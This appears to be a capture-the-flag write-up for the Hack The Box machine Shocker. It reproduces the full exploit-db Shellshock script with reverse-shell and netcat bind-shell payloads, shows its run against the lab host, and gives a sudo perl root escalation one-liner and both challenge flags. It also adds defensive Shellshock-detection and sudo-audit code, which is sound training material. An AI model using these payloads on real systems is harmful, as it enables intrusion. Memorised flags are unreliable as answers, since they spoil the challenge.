HTB:Shocker[WriteUP]

Contents

Connect to the HTB server and start the target machine

1.How many TCP ports are listening on Shocker?

Scan the target's TCP ports for open ports with nmap

2.What is the name of the directory available on the webserver that is a standard name known for running scripts via the Common Gateway Interface?

Run an nmap script and service-version scan against ports 80 and 2222 on the target

Open port 80 on the target directly in a browser

Fuzz paths on the target with ffuf

3.What is the name of the script in the cgi-bin directory?

Continue with ffuf to scan for files in that directory

4.Optional question: The output from user.sh matches the output from what standard Linux command?

5.What 2014 CVE ID describes a remote code execution vulnerability in Bash when invoked through Apache CGI?

Search for keywords with searchsploit

Inspect the EXP code

6.What user is the webserver running as on Shocker?

Run the EXP script with python

7.Submit the flag located in the shelly user's home directory.

USER_FLAG:247db5ad8edaf851b335894b3331607f

8.Which binary can the shelly user run as root on Shocker?

Check which commands the user can run with elevated privileges

9.Submit the flag located in root's home directory.

Look up the relevant privilege-escalation command on GTFOBins

ROOT_FLAG:0197a11120606d77dc7881331357decb


Connect to the HTB server and start the target machine

Target IP: 10.10.10.56

Assigned IP: 10.10.14.12


1.How many TCP ports are listening on Shocker?

Scan the target's TCP ports for open ports with nmap

nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.10.56

From the scan results the target has 2 open ports: 80 and 2222


2.What is the name of the directory available on the webserver that is a standard name known for running scripts via the Common Gateway Interface?

Run an nmap script and service-version scan against ports 80 and 2222 on the target

nmap -p 80,2222 -sCV 10.10.10.56

Open port 80 on the target directly in a browser

The page is plain static HTML, and the tech stack is quite minimal

Fuzz paths on the target with ffuf

ffuf -u http://10.10.10.56/FUZZ -w ../dictionary/common.txt

The scan above found a directory: cgi-bin


3.What is the name of the script in the cgi-bin directory?

Continue with ffuf to scan for files in that directory

ffuf -u http://10.10.10.56/cgi-bin/FUZZ -w ../dictionary/common.txt -e .php,.py,.bak,.sh

Download user.sh locally

wget http://10.10.10.56/cgi-bin/user.sh -O user.sh

View the contents of user.sh

cat user.sh

Content-Type: text/plain

Just an uptime test script

 08:48:37 up  1:11,  0 users,  load average: 0.00, 0.00, 0.00


4.Optional question: The output from user.sh matches the output from what standard Linux command?

The output of running user.sh directly matches the standard output format of uptime

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# uptime  
 09:16:20 up 13:42,  3 users,  load average: 0.07, 0.07, 0.06


5.What 2014 CVE ID describes a remote code execution vulnerability in Bash when invoked through Apache CGI?

From the Wappalyzer plugin earlier we know the target runs Apache 2.4.18

Search for keywords with searchsploit

searchsploit Apache cgi

Copy the EXP whose description mentions Shellshock to the current directory

searchsploit -m 34900.py

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m 34900.py
  Exploit: Apache mod_cgi - 'Shellshock' Remote Command Injection
      URL: https://www.exploit-db.com/exploits/34900
     Path: /usr/share/exploitdb/exploits/linux/remote/34900.py
    Codes: CVE-2014-6278, CVE-2014-6271
 Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/temp/34900.py

From the output, this EXP is based on the vulnerability CVE-2014-6271

Inspect the EXP code

cat 34900.py
#!/usr/bin/env python
from socket import *
from threading import Thread
import thread, time, httplib, urllib, sys

stop = False
proxyhost = ""
proxyport = 0

def usage():
        print """

                Shellshock apache mod_cgi remote exploit

Usage:
./exploit.py var=<value>

Vars:
rhost: victim host
rport: victim port for TCP shell binding
lhost: attacker host for TCP shell reversing
lport: attacker port for TCP shell reversing
pages:  specific cgi vulnerable pages (separated by comma)
proxy: host:port proxy

Payloads:
"reverse" (unix unversal) TCP reverse shell (Requires: rhost, lhost, lport)
"bind" (uses non-bsd netcat) TCP bind shell (Requires: rhost, rport)

Example:

./exploit.py payload=reverse rhost=1.2.3.4 lhost=5.6.7.8 lport=1234
./exploit.py payload=bind rhost=1.2.3.4 rport=1234

Credits:

Federico Galatolo 2014
"""
        sys.exit(0)

def exploit(lhost,lport,rhost,rport,payload,pages):
        headers = {"Cookie": payload, "Referer": payload}

        for page in pages:
                if stop:
                        return
                print "[-] Trying exploit on : "+page
                if proxyhost != "":
                        c = httplib.HTTPConnection(proxyhost,proxyport)
                        c.request("GET","http://"+rhost+page,headers=headers)
                        res = c.getresponse()
                else:
                        c = httplib.HTTPConnection(rhost)
                        c.request("GET",page,headers=headers)
                        res = c.getresponse()
                if res.status == 404:
                        print "[*] 404 on : "+page
                time.sleep(1)


args = {}

for arg in sys.argv[1:]:
        ar = arg.split("=")
        args[ar[0]] = ar[1]
try:
        args['payload']
except:
        usage()

if args['payload'] == 'reverse':
        try:
                lhost = args['lhost']
                lport = int(args['lport'])
                rhost = args['rhost']
                payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+str(lport)+" 0>&1 &"
        except:
                usage()
elif args['payload'] == 'bind':
        try:
                rhost = args['rhost']
                rport = args['rport']
                payload = "() { :;}; /bin/bash -c 'nc -l -p "+rport+" -e /bin/bash &'"
        except:
                usage()
else:
        print "[*] Unsupported payload"
        usage()

try:
        pages = args['pages'].split(",")
except:
        pages = ["/cgi-sys/entropysearch.cgi","/cgi-sys/defaultwebpage.cgi","/cgi-mod/index.cgi","/cgi-bin/test.cgi","/cgi-bin-sdb/printenv"]

try:
        proxyhost,proxyport = args['proxy'].split(":")
except:
        pass

if args['payload'] == 'reverse':
        serversocket = socket(AF_INET, SOCK_STREAM)
        buff = 1024
        addr = (lhost, lport)
        serversocket.bind(addr)
        serversocket.listen(10)
        print "[!] Started reverse shell handler"
        thread.start_new_thread(exploit,(lhost,lport,rhost,0,payload,pages,))
if args['payload'] == 'bind':
        serversocket = socket(AF_INET, SOCK_STREAM)
        addr = (rhost,int(rport))
        thread.start_new_thread(exploit,("",0,rhost,rport,payload,pages,))

buff = 1024

while True:
        if args['payload'] == 'reverse':
                clientsocket, clientaddr = serversocket.accept()
                print "[!] Successfully exploited"
                print "[!] Incoming connection from "+clientaddr[0]
                stop = True
                clientsocket.settimeout(3)
                while True:
                        reply = raw_input(clientaddr[0]+"> ")
                        clientsocket.sendall(reply+"\n")
                        try:
                                data = clientsocket.recv(buff)
                                print data
                        except:
                                pass

        if args['payload'] == 'bind':
                try:
                        serversocket = socket(AF_INET, SOCK_STREAM)
                        time.sleep(1)
                        serversocket.connect(addr)
                        print "[!] Successfully exploited"
                        print "[!] Connected to "+rhost
                        stop = True
                        serversocket.settimeout(3)
                        while True:
                                reply = raw_input(rhost+"> ")
                                serversocket.sendall(reply+"\n")
                                data = serversocket.recv(buff)
                                print data
                except:
                        pass
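The script above delivers its payload in the Cookie and Referer request headers. That works because mod_cgi exports request headers to the CGI process as environment variables (HTTP_COOKIE, HTTP_REFERER, HTTP_USER_AGENT), and an unpatched bash parses any environment value that starts with "() {" as a function definition and then runs whatever follows it. A patched bash ignores the trailing commands, so the fix is the bash update; the check below is what you run on hosts that still expose CGI. It is an added Python 3 example, not part of the original writeup or of the exploit-db script: it flags request headers, and the Referer/User-Agent fields of Apache combined-format access log lines, that carry the "() {" prefix. The log lines are constructed sample data, and the regular expressions and field names are assumptions made for the example.

```python
import re
from typing import Dict, List

# CVE-2014-6271 (Shellshock) is triggered when an environment variable's value
# starts with a bash function definition "() {". Apache's mod_cgi copies request
# headers into the CGI environment (Cookie -> HTTP_COOKIE, Referer -> HTTP_REFERER,
# User-Agent -> HTTP_USER_AGENT), so a header value carrying that prefix is the
# signature to look for. Matching only the prefix also covers the later variants
# (e.g. CVE-2014-7169), whose trailing commands differ but start the same way.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Apache "combined" log format (assumed layout). Only Referer and User-Agent
# reach this log; a Cookie-borne payload is only visible if the LogFormat also
# records %{Cookie}i.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def header_is_shellshock(value: str) -> bool:
    """True if a header value carries the Shellshock function-definition prefix."""
    return SHELLSHOCK_RE.search(value) is not None


def scan_headers(headers: Dict[str, str]) -> List[str]:
    """Return the names of request headers that carry a Shellshock-style value."""
    return [name for name, value in headers.items() if header_is_shellshock(value)]


def scan_access_log(lines: List[str]) -> List[dict]:
    """Scan combined-format access log lines; return one hit per suspicious line."""
    hits = []
    for line in lines:
        m = COMBINED_RE.match(line)
        if not m:  # not combined format: skip rather than guess at the fields
            continue
        fields = [f for f in ("referer", "ua") if header_is_shellshock(m.group(f))]
        if fields:
            # keep the status too: a 500 from the CGI still means the payload arrived
            hits.append({"ip": m.group("ip"), "request": m.group("req"),
                         "status": m.group("status"), "fields": fields})
    return hits


# Constructed sample log lines (not real traffic from the target).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:08:48:37 +0000] "GET /cgi-bin/user.sh HTTP/1.1" '
    '200 118 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [10/Oct/2023:08:50:01 +0000] "GET /cgi-bin/user.sh HTTP/1.1" '
    '200 118 "() { :;}; echo probe" "() { :;}; echo probe"',
    "this line is not in combined format and is skipped",
]


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f"[!] {hit['ip']} {hit['request']} -> payload in {', '.join(hit['fields'])}")
```

scan_headers is meant to sit in front of the CGI handler (a WAF rule or a request filter), while scan_access_log is the after-the-fact check over existing logs; both share the one prefix pattern, so a benign User-Agent such as "Mozilla/5.0 (X11; ...)" is not flagged because "(X11" is not the literal "()" followed by "{".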

6.What user is the webserver running as on Shocker?

Run the EXP script with python

python2 34900.py rhost=10.10.10.56 rport=80 lhost=10.10.14.12 lport=1425 pages=/cgi-bin/user.sh payload=reverse

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# python2 34900.py rhost=10.10.10.56 rport=80 lhost=10.10.14.12 lport=1425 pages=/cgi-bin/user.sh payload=reverse
[!] Started reverse shell handler
[-] Trying exploit on : /cgi-bin/user.sh
[!] Successfully exploited
[!] Incoming connection from 10.10.10.56
10.10.10.56> whoami
shelly

From the output of the whoami command, the current user is: shelly


7.Submit the flag located in the shelly user's home directory.

Find the location of user_flag and view its contents

10.10.10.56> find / -name 'user.txt' 2>/dev/null
/home/shelly/user.txt

10.10.10.56> cat /home/shelly/user.txt
247db5ad8edaf851b335894b3331607f

USER_FLAG:247db5ad8edaf851b335894b3331607f


8.Which binary can the shelly user run as root on Shocker?

Check which commands the user can run with elevated privileges

sudo -l

10.10.10.56> sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

The binary that can be run with elevated privileges is: perl
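A sudo rule like the one above, NOPASSWD on an interpreter as root, is equivalent to handing the user root, which is why auditing sudo -l output across a fleet is routine hardening work. The following Python 3 parser is an added example, not part of the original writeup: it parses the command entries from sudo -l output and flags rules whose target binary is a shell or scripting interpreter (or ALL) run as root. The first sample is the output shown above; the second sample rule set and the list of interpreter names are assumptions made for the example, and the list is illustrative rather than exhaustive.

```python
import re
from os.path import basename
from typing import Dict, List

# Interpreters and shells that can spawn an arbitrary process: a sudo rule
# granting any of these as root is a direct root escalation (the perl rule on
# Shocker is the page's instance). Illustrative list, not exhaustive (assumption).
INTERPRETERS = {"sh", "bash", "dash", "zsh", "perl", "python", "python2",
                "python3", "ruby", "php", "node", "lua"}

# One rule line as printed by sudo -l:   (root) NOPASSWD: /usr/bin/perl
# The tags group captures zero or more "TAG:" prefixes such as NOPASSWD or SETENV.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text: str) -> List[Dict[str, object]]:
    """Parse the 'may run the following commands' block of sudo -l output."""
    entries = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue  # skip the "Matching Defaults entries" preamble
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        # several commands may share one rule line, separated by commas
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            entries.append({"runas": m.group("runas").strip(),
                            "nopasswd": "NOPASSWD" in tags,
                            "command": cmd})
    return entries


def risky_entries(entries: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Rules that run an interpreter (or ALL) as root; each one yields a root shell."""
    risky = []
    for e in entries:
        runas_user = str(e["runas"]).split(":")[0].strip()
        if runas_user not in ("root", "ALL"):
            continue
        parts = str(e["command"]).split()
        binary = parts[0] if parts else ""
        if e["command"] == "ALL" or basename(binary) in INTERPRETERS:
            risky.append(e)
    return risky


# The sudo -l output from the target, as shown in the writeup.
SAMPLE_SUDO_L = r"""Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
"""

# Constructed second sample: an argument-restricted service command, an
# unrestricted interpreter on the same line, and a shell that only runs as www-data.
SAMPLE_MIXED = r"""User alice may run the following commands on web01:
    (root) /usr/bin/systemctl restart apache2, /usr/bin/python3
    (www-data) NOPASSWD: /bin/bash
"""


if __name__ == "__main__":
    for sample in (SAMPLE_SUDO_L, SAMPLE_MIXED):
        for e in risky_entries(parse_sudo_l(sample)):
            pw = "NOPASSWD" if e["nopasswd"] else "password"
            print(f"[!] root via {e['command']} ({pw})")
```

The "restart apache2" rule is not flagged because the argument-restricted systemctl binary is not an interpreter, and the bash rule is not flagged because it runs as www-data, not root; the same parser handles the "(ALL : ALL) ALL" form because the run-as user is read up to the first colon.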


9.Submit the flag located in root's home directory.

Look up the relevant privilege-escalation command on GTFOBins

sudo /usr/bin/perl -e 'exec "/bin/sh";'

10.10.10.56> sudo /usr/bin/perl -e 'exec "/bin/sh";'
whoami
10.10.10.56> root

Find the location of root_flag and view its contents

10.10.10.56> find / -name 'root.txt'
/root/root.txt

10.10.10.56> cat /root/root.txt
0197a11120606d77dc7881331357decb

ROOT_FLAG:0197a11120606d77dc7881331357decb
